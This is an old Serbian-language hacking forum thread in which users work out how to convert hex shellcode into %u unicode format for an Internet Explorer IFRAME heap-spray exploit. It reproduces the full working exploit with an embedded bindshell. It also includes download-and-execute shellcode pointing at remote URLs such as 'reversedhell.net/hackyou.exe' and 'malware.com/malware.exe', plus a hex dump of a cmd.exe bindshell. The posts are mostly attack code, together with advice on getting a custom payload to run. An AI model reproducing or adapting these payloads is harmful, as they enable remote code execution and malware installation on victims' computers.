[ Krajisnik @ 29.11.2004. 16:23 ] @
Pojavio se sad vec davno jedan POC exploit za Internet Explorer... I unutar njega lik je "ugradio" unicoded shelcode, ili ima veze sa UTF-8.. Nemam pojma, toliko sam toga procitao i jos uvek nisam uspeo da odgonetnem kako da standardan hex shellcode prebacim u ovaj format iz exploita.. Ima i u Phracku 62 objasnjenje koje se tice ovoga, al nisam bas najbolje razumeo da li mi to treba..
Ovo je taj exploit:
Code:

<HTML>
  <SCRIPT language="javascript">
    // Win32 MSIE exploit helper script, creates a lot of nopslides to land in
    // and/or use as return address. Thanks to blazde for feedback and idears.

    // Win32 bindshell (port 28876, '\0' free, looping). Thanks to HDM and
    // others for inspiration and borrowed code.
    shellcode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");
    // Nopslide will contain these bytes:
    bigblock = unescape("%u0D0D%u0D0D");
    // Heap blocks in IE have 20 dwords as header
    headersize = 20;
    // This is all very 1337 code to create a nopslide that will fit exactly
    // between the the header and the shellcode in the heap blocks we want.
    // The heap blocks are 0x40000 dwords big, I can't be arsed to write good
    // documentation for this.
    slackspace = headersize+shellcode.length
    while (bigblock.length<slackspace) bigblock+=bigblock;
    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0x40000) block = block+block+fillblock;
    // And now we can create the heap blocks, we'll create 700 of them to spray
    // enough memory to be sure enough that we've got one at 0x0D0D0D0D
    memory = new Array();
    for (i=0;i<700;i++) memory[i] = block + shellcode;
  </SCRIPT>
  <!--
    The exploit sets eax to 0x0D0D0D0D after which this code gets executed:
    7178EC02                      8B08            MOV     ECX, DWORD PTR [EAX]
    [0x0D0D0D0D] == 0x0D0D0D0D, so ecx = 0x0D0D0D0D.
    7178EC04                      68 847B7071     PUSH    71707B84
    7178EC09                      50              PUSH    EAX
    7178EC0A                      FF11            CALL    NEAR DWORD PTR [ECX]
    Again [0x0D0D0D0D] == 0x0D0D0D0D, so we jump to 0x0D0D0D0D.
    We land inside one of the nopslides and slide on down to the shellcode.
  -->
  <IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC഍഍"></IFRAME>
</HTML>

Dakle, trazim pomoc da mi neko kaze kako da ovaj moj shellcode prebacim u taj format %uXXXX... Bio bi pozeljan i mozda neki C programcic..
Code:

unsigned char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x30\x5F\xFC\x8B\xF7\x80"
"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1"
"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B"
"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40"
"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D"
"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33"
"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80"
"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6"
"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02"
"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03"
"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03"
"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76"
"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06"
"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02"
"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D"
"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC"
"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1"
"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53"
"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9"
"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0"
"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D"
"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B"
"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1"
"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4"
"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0"
"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4"
"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0"
"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75"
"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64"
"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F"
"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F"
"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F"
"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50"
"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6C\x08\x49"
"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65"
"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65"
"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65"
"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x65\x08"
 "http://reversedhell.net/hackyou.exe"
 "\x08\x01"; // download + exec from the net ;
[ Vojislav Milunovic @ 29.11.2004. 22:26 ] @
Pa uzim lepo svoj shellcode i umesto \x90\x90 itd ti ga prekucaj u
%u9090 itd...itd... do kraja shellcode-a bas kao sto je lik i uradio na ovom primeru =) mislim da je tako ako nije ispravte me =)
[ Krajisnik @ 30.11.2004. 01:38 ] @
To sam prvo napravio, al jok.. Samo se skrshi IE... Izgleda da imaju neka pravila kad se prebacuje HEX u UTF8 format..
http://www.phrack.org/phrack/62/p62-0x09_UTF8_Shellcode.txt

..ako je to to...
[ Vojislav Milunovic @ 30.11.2004. 22:10 ] @
Probaj sa tim textom...
mozda ti eip nije podesen na pravi jmp =)
moja preporuka je da pokrenes neki debugger i da vidis da nije mozda u tome finta
Ako nije, onda odstampaj ovaj textic i pazljivo ga procitaj =) da ne coravis bezveze pred monitorom =)
[ Krajisnik @ 01.12.2004. 22:33 ] @
Ma nema samse.. Probavam vec nedelju dana, al mogu da vedrim i oblacim kad nemam dovoljno znanja.. Pa cak i da ubodem pravi nacin za konvertovanje, desila bi se sitna greska provereno...

Ce la vi...
[ Vojislav Milunovic @ 02.12.2004. 00:10 ] @
Pa pazi provedes 1h citajuci, 2 testirajuci i resenje ima da samo proizadje =)
Pokreni ollydbg ili windbg i prati sta se to sjebe u tvom kodu...
Veruj mi za manje od 15min ce ti se desiti jedan od onih "A-haa" momenata i proradice sve 100%... ja sam uz pomoc debuggera pisao moj shellcode, pratio registre da vidim koji i kad da sacuvam i sl... =)

poz...
[ Krajisnik @ 02.12.2004. 00:56 ] @
Ne znam ti ja nista o debuggerima, a niti o kodiranju shellcoda... To je jedini problem.. A da krenem da ucim sve od pocetka, i sam znas da je nemoguce.. Bar ne pre 70-e.. :)
[ Vojislav Milunovic @ 02.12.2004. 12:03 ] @
Ako znas C, asm i386 je pickin dim za nauciti... mozda ti treba mesec dana, ako bas sabijas C u smislu da brzo pravis algoritme, znas dobro da radis sa pointerima...
sve to isto radis i u asm samo na jedan malko slozeniji nacin...
Mozda ti ovaj bind shellcode koji si postovao uopste i ne radi pa ti zato pada IE... ja sam mislio da si ga ti licno pisao pa da imas poverenja u njega, ovako ne znam da li uopste taj shellcode radi =)
poz =)
[ DownBload @ 02.12.2004. 21:23 ] @

To je obican shellcode enkodiran u unicode standard, znaci da umjesto standardnog ASCII (2^8) imas UNICODE (2^16 = 65,535 mogucih vrijednosti), pa su za jedan znak potrebna 2 bajta (%u0178). Ovaj %u oznacava
da se radi o unicodeu.

Pozdrav...
[ Vojislav Milunovic @ 03.12.2004. 00:04 ] @
Da to se dalo zakljuciti iz samo formata datog exploita...
A Unicode se zna da ide po 2 byte to barem nije nista novo =)
[ Krajisnik @ 03.12.2004. 18:31 ] @
Jel ima neki program koji bi prebacio ovaj HEX u UNICODE format?
[ Vojislav Milunovic @ 03.12.2004. 20:02 ] @
Pa to se rucno radi =)
Mozda tvoj shellcode koji oces da prebacis ima neki bug... pa ti zato pada IE, mozda ne pogadjas pravu ret adresu... ko bi ga znao... moras to sam da ispitas...
Malo debugger, malo asm , malo razumevanja za windows APIje i imas kod koji radi ocas posla =) Mogu ja da ti posaljem moji bind shellcode ako oces, mada ih ima gomila na netu... Ali opet ces morati da ga prebacis u hex:

Uostalom evo ti ceo HEX dump shellcode-a pa ako oces da ga prebacujes samo izvoli:
Code:

E9 60 01 00 00 5D 64 A1 30 00 00 00 8B 40 0C 8B    
70 1C AD 8B 50 08 89 55 00 33 C9 B1 05 8D 75 04    
8D 7D 04 E8 C2 00 00 00 8D 45 30 50 FF 55 08 89    
45 30 33 C9 B1 04 8D 75 18 8B FE 92 E8 A9 00 00    
00 6A 04 68 00 10 00 00 6A 64 51 FF 55 14 89 45    
28 33 D2 8B CA B1 64 88 10 40 E2 FB 52 52 52 52    
42 52 42 52 FF 55 18 89 45 2C 8B 55 28 33 C9 89    
4A 04 66 41 66 41 66 89 0A 66 C7 42 02 15 B3 B1    
10 51 52 50 FF 55 1C 6A 01 8B 45 2C 50 FF 55 20     
33 C0 50 50 8B 45 2C 50 FF 55 24 8B 55 28 83 C2    
10 C7 02 44 00 00 00 89 42 38 89 42 3C 89 42 40    
66 C7 42 30 00 00 C7 42 2C 01 01 00 00 8B 5D 28    
83 C3 55 33 C9 53 52 51 51 51 41 51 49 51 51 8D    
75 37 56 51 FF 55 04 8B 5D 28 83 C3 55 6A FF FF    
33 FF 55 0C 33 C0 50 FF 55 10 55 AD 57 56 51 52    
50 52 E8 0C 00 00 00 83 C4 08 5A 59 5E 5F AB E2    
EA 5D C3 55 8B EC 8B 7D 08 03 7F 3C 8B 7F 78 03    
7D 08 8B 57 20 03 55 08 33 C0 8B 32 03 75 08 E8    
27 00 00 00 3B 4D 0C 74 06 40 83 C2 04 EB EB 8B    
77 24 03 75 08 33 D2 66 8B 14 46 8B 77 1C 03 75    
08 8B 04 96 03 45 08 8B E5 5D C3 50 33 C9 8B D9    
B3 99 33 C0 AC 85 C0 74 0A C1 E0 10 33 C3 03 C8   
4B EB EF 58 C3 E8 9B FE FF FF 41 41 41 41 03 08    
74 05 EA 06 96 04 B0 0A 75 07 5C 06 79 04 EA 06    
D2 04 CD 05 95 03 5E 02 9D 01 87 03 8F 02 87 03    
70 02 41 41 41 41 41 41 41 41 77 73 32 5F 33 32    
00 63 6D 64 20 2F 6B 00     


Samo napravi svoji xor algoritam da zaobidjes ove NULL bajtove i imas shellcode
koji radi 100%, binduje cmd.exe /k na 5555 port i to je to...
[ DownBload @ 05.12.2004. 14:08 ] @
Citat:
Krajisnik: Jel ima neki program koji bi prebacio ovaj HEX u UNICODE format?


Tip koji je napisao exploit za iframe overflow napisao je i neki programcic koji radi takve
konverzije. Malo proguglaj.
[ Krajisnik @ 05.12.2004. 15:29 ] @
Mislim da sam pretrazio 99% linkova sa googla da bih nasao, al bez uspeha.. Ako si ti nasao, uploaduj ovde pa cu da pogledam..
[ Krajisnik @ 05.12.2004. 18:23 ] @
Eh, taman kad sam mislio da sam sve shvatio..
Nasao sam drugi shellcode, i isprobao ga.. Radi..

Code:

#include <windows.h>
#include <stdio.h>

char shellcode[]=
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26"
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14"
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E"
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48"
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB"
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65"
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17"
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10"
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1"
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED"
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13"
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17"
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17"
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8"
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE"
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17"
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17"
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40"
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8"
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17"
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17"
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1"
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7"
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92"
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A"
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40"
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50"
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B"
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65"
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72"
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B"
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E"
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72"
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56"
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65"
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73"
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27"
"\x27\x39\x72\x6F\x72\x17"
"m00!"
"http://www.malware.com/malware.exe"
"\x01";

main()
  {
    int *ret;
    ret=(int*)&ret+2;
    (*ret)=(int)shellcode;
  }


Onda sam konvertovao svaki \xYY znak u %uXXXX format...
Primer(da vidite da li sam to dobro uradio) uzmimo prva 4 HEX bajta iz ovog shellcoda...
\xEB\x0F\x58\x80\ == %ueb0f%u5880

pod pretpostavkom da sam sve dobro napravio, zamenio sam moj novi unicoded shellcoded sa onim u gornjem exploitu, i InternetExplorer se skrshi...
Gde moze da bude greska..?
[ Vojislav Milunovic @ 07.12.2004. 16:53 ] @
Pa problem je mozda u tome sto progy podrazumeva, da ces sa neke adrese skinuti odredjeni file koji ce se izvrsiti i posao je gotov, medjutim, moguce je da se taj file uopste ne skine i umesto da CreateProcess uspe, naletis na kraj programa ili da budem precizniji na tvoj string table na kome pukne... Ne znam sta da ti kazem, buffer overflow tehnike rade da kazem relativno, jer uvek ima bojazan da neces pogoditi pravi buffer za eip... to je cudna rabota, i ne znam da li nije bilo nekoga ko se bavio buffer overflowom i postavljao pitanje kako da nadje adresu buffera bez nagadjanja... a da uvek mali taj metod =)
[ Sundance @ 18.12.2004. 06:58 ] @
De majketi instaliraj i slozi SoftICE i stavi da ti kupi application-level exceptione u sebe pa onda gledaj

1) gdje je tvoj exploit
2) sta je na stogu
3) na sto pokazuje eip

i zabava moze poceti :)
[ Krajisnik @ 18.12.2004. 07:19 ] @
Gledajte, originalni POC exploit radi 100%, i ima u sebi unicoded Bindshell...
Znaci, exploit sam po sebi ne treba da se proverava, jer 100% radi.. Doduse, pathovan je pre par dana...
Ja sam samo hteo da zamenim taj deo koda gde se nalazi bindshell, sa mojim shellom...
Taj shell sam isprobao lokalno i downloaduje fajl, pokrene, i sve radi kako treba.. Zatim sam isti taj shellcode(bez ikakvih modifikacija), konvertovao u unicode format i ubacio ga u exploit...
Sa originalnim exploitom, IE se samo zabode i u pozadini se pokrene bindshell, dok se sa mojim shellom, IE skrshi, tj. izbaci error...
Samim tim sam zakljucio da nisam dobro prebacio moj shellcode u unicode format, ili mozda u unicode-u ne sme da bude neki char, npr. 0x00, ne znam, nagadjam..
A sto se tice softIcea, ne znam nista u vezi toga, niti debugiranja uopste, tako da taj deo moze neko samo od vas da napravi,ako ima vremena..
[ Krajisnik @ 18.12.2004. 18:44 ] @
Heh, uspeo sam.. Trebalo je staviti nekoliko NOPova ispred shellcoda..
[ Vertyg01 @ 20.01.2005. 19:50 ] @
Da li postoji odredjeni konvertor iz hex-a (shellcode) u unicode ili mozda neka tabela iz koje bi mogao to konvertovati ?
[ Vojislav Milunovic @ 20.01.2005. 22:23 ] @
pa umesto \x90\x34 kucaj %u9034 ja mislim da ce to da radi
[ Vertyg01 @ 21.01.2005. 01:10 ] @
oh hvala nisam ranije primjetio ;)
[ ocamis @ 07.07.2005. 03:51 ] @
Hi.

Can someone give a working example of code in unicode that downloads end execs 1.exe from the same site.
Or mb explain how can i do it myself from this code
Code:
Code:

#include <windows.h>
#include <stdio.h>

char shellcode[]=
"\xEB\x0F\x58\x80\
........
"\x27\x39\x72\x6F\x72\x17"
"m00!"
"http://www.malware.com/malware.exe"
"\x01";

main()
  {
    int *ret;
    ret=(int*)&ret+2;
    (*ret)=(int)shellcode;
  }


reply in english
Thanks.
[ Sundance @ 07.07.2005. 07:27 ] @
Read this shit:

Building IA32 'Unicode-Proof' Shellcodes

At the end of the article you have common asm snippets written in a UNICODE-friendly way..